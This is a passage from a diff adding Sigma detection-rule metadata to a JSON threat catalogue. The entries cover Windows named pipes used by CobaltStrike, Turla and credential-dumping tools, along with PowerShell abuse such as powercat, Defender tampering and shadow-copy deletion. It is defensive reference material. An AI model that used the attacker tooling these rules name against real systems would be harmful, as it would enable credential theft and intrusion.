"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/12", + "filename": "net_connection_win_wuauclt_network_connection.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Legitimate use of wuauclt.exe over the network." + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", + "value": "Alternate PowerShell Hosts Pipe", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/09/12", + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter." + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects a named pipe used by Turla group samples", + "uuid": "739915e4-1e70-4778-8b8a-17db02f66db1", + "value": "Turla Group Named Pipes", + "meta": { + "refs": [ + "Internal Research", + "https://attack.mitre.org/groups/G0010/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1106" + ], + "creation_date": "2017/11/06", + "filename": "pipe_created_apt_turla_namedpipes.yml", + "author": "Markus Neis", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "value": "Cred Dump-Tools Named Pipes", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_cred_dump_tools_named_pipes.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" + ], + "creation_date": "2019/11/01", + "filename": "pipe_created_cred_dump_tools_named_pipes.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "critical", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "uuid": "1f7025a6-e747-4130-aac4-961eb47015f1", + "value": "DiagTrackEoP Default Named Pipe", + "meta": { + "refs": [ + "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/08/03", + "filename": "pipe_created_diagtrack_eop_default_pipe.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "uuid": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "value": "EfsPotato Named Pipe", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", + "https://github.com/zcgonvh/EfsPotato", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2021/08/23", + "filename": "pipe_created_efspotato_namedpipe.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of default named pipes used by the Koh tool", + "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "value": "Koh Default Named Pipes", + "meta": { + "refs": [ + "https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" + ], + "creation_date": "2022/07/08", + "filename": "pipe_created_koh_default_pipe.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "uuid": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "value": "CobaltStrike Named Pipe", + "meta": { + "refs": [ + "https://twitter.com/d4rksystem/status/1357010969264873472", + "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", + "https://github.com/Neo23x0/sigma/issues/253", + "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2021/05/25", + "filename": "pipe_created_mal_cobaltstrike.yml", + "author": "Florian Roth, Wojciech Lesicki", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "uuid": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "value": "CobaltStrike Named Pipe Pattern Regex", + "meta": { + "refs": [ + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2021/07/30", + "filename": "pipe_created_mal_cobaltstrike_re.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a named pipe used by known APT malware", + "uuid": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", + "value": "Malicious Named Pipe", + "meta": { + "refs": [ + "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", + "https://securelist.com/faq-the-projectsauron-apt/75533/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2017/11/06", + "filename": "pipe_created_mal_namedpipes.yml", + "author": "Florian Roth, blueteam0ps, elhoim", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects PAExec default named pipe", + "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", + "value": "PAExec Default Named Pipe", + "meta": { + "refs": [ + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2022/10/26", + "filename": "pipe_created_paexec_default_pipe.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", + "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", + "value": "PowerShell Execution Via Named Pipe", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/09/12", + "filename": "pipe_created_powershell_execution_pipe.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "informational", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "uuid": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", + "value": "PsExec Default Named Pipe", + "meta": { + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2017/06/12", + "filename": "pipe_created_psexec_default_pipe.yml", + "author": "Thomas Patzke", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "value": "PsExec Tool Execution From Suspicious Locations - PipeName", + "meta": { + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2022/08/04", + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Rare legitimate use of psexec from the locations mentioned above" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "uuid": "9e77ed63-2ecf-4c7b-b09d-640834882028", + "value": "PsExec Pipes Artifacts", + "meta": { + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_pipes_artifacts.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2020/05/10", + "filename": "pipe_created_psexec_pipes_artifacts.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate Administrator activity" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "uuid": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "value": "ADFS Database Named Pipe Connection", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", + "https://o365blog.com/post/adfs/", + "https://github.com/Azure/SimuLand", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ], + "creation_date": "2021/10/08", + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Processes in the filter condition" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "uuid": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "value": "CobaltStrike Named Pipe Patterns", + "meta": { + "refs": [ + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2021/07/30", + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml", + "author": "Florian Roth, Christian Burkard", + "level": "high", + "falsepositive": [ + "Chrome instances using the exact same pipe name \"mojo.something\"" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", + "value": "WMI Event Consumer Created Named Pipe", + "meta": { + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml" + ], + "tags": [ + "attack.t1047", + "attack.execution" + ], + "creation_date": "2021/09/01", + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "uuid": "d7326048-328b-4d5e-98af-86e84b17c765", + "value": "Alternate PowerShell Hosts", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/08/11", + "filename": "posh_pc_alternate_powershell_hosts.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "medium", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "value": "Delete Volume Shadow Copies Via WMI With PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2021/06/03", + "filename": "posh_pc_delete_volume_shadow_copies.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "uuid": "6331d09b-4785-4c13-980f-f96661356249", + "value": "PowerShell Downgrade Attack - PowerShell", + "meta": { + "refs": [ + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/22", + "filename": "posh_pc_downgrade_attack.yml", + "author": "Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell called from an executable by the version mismatch method", + "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "value": "PowerShell Called from an Executable Version Mismatch", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_pc_exe_calling_ps.yml", + "author": "Sean Metcalf (source), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", + "value": "Netcat The Powershell Version", + "meta": { + "refs": [ + "https://nmap.org/ncat/", + "https://github.com/besimorhino/powercat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ], + "creation_date": "2021/07/21", + "filename": "posh_pc_powercat.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote PowerShell sessions", + "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "value": "Remote PowerShell Session (PS Classic)", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "creation_date": "2019/08/10", + "filename": "posh_pc_remote_powershell_session.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Legitimate use remote PowerShell sessions" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Detects renamed powershell", + "uuid": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", + "value": "Renamed Powershell Under Powershell Channel", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/06/29", + "filename": "posh_pc_renamed_powershell.yml", + "author": "Harish Segar, frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/07/13", + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell download command", + "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", + "value": "Suspicious PowerShell Download", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_pc_susp_download.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "value": "Use Get-NetTCPConnection", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ], + "creation_date": "2021/12/10", + "filename": "posh_pc_susp_get_nettcpconnection.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ], + "creation_date": "2021/07/20", + "filename": "posh_pc_susp_zip_compress.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", + "uuid": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "value": "Tamper Windows Defender - PSClassic", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_with_windows_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/06/07", + "filename": "posh_pc_tamper_with_windows_defender.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_provider_start", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "value": "Suspicious Non PowerShell WSMAN COM Provider", + "meta": { + "refs": [ + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://github.com/bohops/WSMan-WinRM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" + ], + "creation_date": "2020/06/24", + "filename": "posh_pc_wsman_com_provider_no_powershell.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", + "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/06/29", + "filename": "posh_pc_xor_commandline.yml", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", + "value": "Alternate PowerShell Hosts - PowerShell Module", + "meta": { + "refs": [ + "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/08/11", + "filename": "posh_pm_alternate_powershell_hosts.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "medium", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "value": "Bad Opsec Powershell Code Artifacts", + "meta": { + "refs": [ + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", + "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://www.mdeditor.tw/pl/pgRt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "posh_pm_bad_opsec_artifacts.yml", + "author": "ok @securonix invrep_de, oscd.community", + "level": "critical", + "falsepositive": [ + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects keywords that could indicate clearing PowerShell history", + "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", + "value": "Clear PowerShell History - PowerShell Module", + "meta": { + "refs": [ + "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ], + "creation_date": "2019/10/25", + "filename": "posh_pm_clear_powershell_history.yml", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", + "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", + "value": "PowerShell Decompress Commands", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/8", + "https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ], + "creation_date": "2020/05/02", + "filename": 